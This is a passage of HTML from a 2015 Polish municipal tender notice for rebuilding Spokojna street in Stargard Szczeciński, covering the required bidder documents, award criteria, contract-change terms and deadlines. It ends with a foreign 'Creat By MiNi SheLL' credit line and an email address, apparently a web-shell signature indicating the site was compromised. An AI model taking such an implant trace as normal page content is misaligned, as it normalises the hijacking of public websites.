<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Kosztorysy ofertowe (wycena ofertowa) sporządzone zgodnie z instrukcją sporządzenia wyceny ofertowej będącej załącznikiem SIWZ,
2)	Wykonawca, który przy wykazywaniu spełniania warunków udziału w postępowaniu polega na  zasobach innych podmiotów przedkłada także:	
a)	pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - w zakresie osób zdolnych do wykonania zamówienia,
b)	w przypadku gdy Wykonawca nie mający wymaganej wiedzy i doświadczenia, a więc Wykonawca niezdolny do wykonania zamówienia, polega na wiedzy i doświadczeniu innego podmiotu - pisemne zobowiązanie tego podmiotu do podjęcia się wykonania zamówienia jako Podwykonawca - w tym zakresie robót, w którym Wykonawca polega na wiedzy i doświadczeniu (wg wzoru załącznika 2a). Za roboty takie uznaje się roboty zastrzeżone do osobistego wykonania określone w rozdziale II pkt.2 ppkt 9 oraz roboty związane z wykonywaniem podbudów z kruszywa łamanego stabilizowanego mechanicznie. W takim przypadku Wykonawca obowiązany jest wykazać w załączniku nr 2 ten zakres robót, który zleci Podwykonawcy. Powoływanie się na zasoby innego podmiotu jest niedopuszczalne w przypadku gdy warunek wiedzy i doświadczenia dotyczący wykonanych robót samodzielnie spełnia Wykonawca 
3)	dokumenty wykazujące uprawnienia osoby lub osób podpisujących ofertę do dokonywania czynności prawnych i podejmowania zobowiązań w imieniu Wykonawcy (pełnomocnictwa);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Skrócenie terminu realizacji zamówienia - 4</li>
<li>3 - Wydłużenie okresu gwarancji - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>(na podstawie art. 144 ust. 1 ustawy). Zamawiający przewiduje możliwość dokonywania następujących zmian w umowie:
1)	zmiana umowy na wniosek Wykonawcy dotyczący przedłużenia terminu realizacji zamówienia. Rozpatrując wniosek Zamawiający oceni czy wystąpiły przyczyny nie leżące po stronie Wykonawcy, dla których konieczne jest przedłużenie terminu realizacji zamówienia. Dopuszcza się zmianę terminu z przyczyn leżących po stronie Zamawiającego. Zamawiający zastrzega sobie prawo nie uwzględnienia wniosku Wykonawcy jeśli uzna, że przesłanki wniosku Wykonawcy nie mogą stanowić podstawy do zmiany terminu. Ponieważ termin realizacji zamówienia stanowi kryterium wyboru oferty najkorzystniejszej - zmiana terminu powodowana może być jedynie okolicznościami nadzwyczajnymi, które dotyczyłyby każdego potencjalnego wykonawcy. 
2)	zmiana umowy wynikająca z konieczności wykonania robót dodatkowych lub wprowadzenia robót zamiennych, które nie były przewidziane w zestawieniu prac planowanych (przedmiarze), nie wykraczających poza określenie przedmiotu zamówienia. Zmiana polegać może na uwzględnieniu robót dodatkowych lub zamiennych w umowie w wymiarze rzeczowym i finansowym. Roboty dodatkowe nie wykraczające poza określenie przedmiotu zamówienia są objęte przedmiotem zamówienia, a ich wykonanie odbywa się w ramach zamówienia podstawowego (w ramach umowy podstawowej),
3)	zmiana umowy dotycząca uszczegółowienia rzeczywistego końcowego wynagrodzenia. W związku z przyjętym sposobem ustalania wynagrodzenia kosztorysem powykonawczym możliwe jest, że kwota wynagrodzenia końcowego będzie większa od kwoty wynikającej ze złożonej oferty i określonej w umowie. W takim przypadku Zamawiający zastrzega sobie prawo zmiany umowy poprzez sprecyzowanie rzeczywistego końcowego wynagrodzenia,
4)	wszelkie inne zmiany postanowień zawartej umowy, których wprowadzenie nie jest sprzeczne z treścią oferty, na podstawie której dokonano wyboru Wykonawcy oraz nie narusza zasad uczciwej konkurencji i równego traktowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.stargard.pl/index.php?id=zampub&zp=list<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> pobranie ze strony www.stargard.pl (www.stargard.pl / Miasto / Bieżące informacje / Zamówienia publiczne (BIP)
http://bip.um.stargard.pl/index.php?id=zampub&zp=list.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2015 godzina 10:00, miejsce: Biuro Obsługi Klienta, Urząd Miejski
ul. Czarnieckiego 17, 73-110 Stargard Szczeciński.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie zadania w ramach  Narodowego Programu Przebudowy Dróg Lokalnych - Etap II - Bezpieczeństwo - Dostępność - Rozwój. Projekt:  Przebudowa ulicy Spokojnej w Stargardzie Szczecińskim na odcinku od ulicy Kościuszki do ulicy Giżynek w celu poprawy bezpieczeństwa drogowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com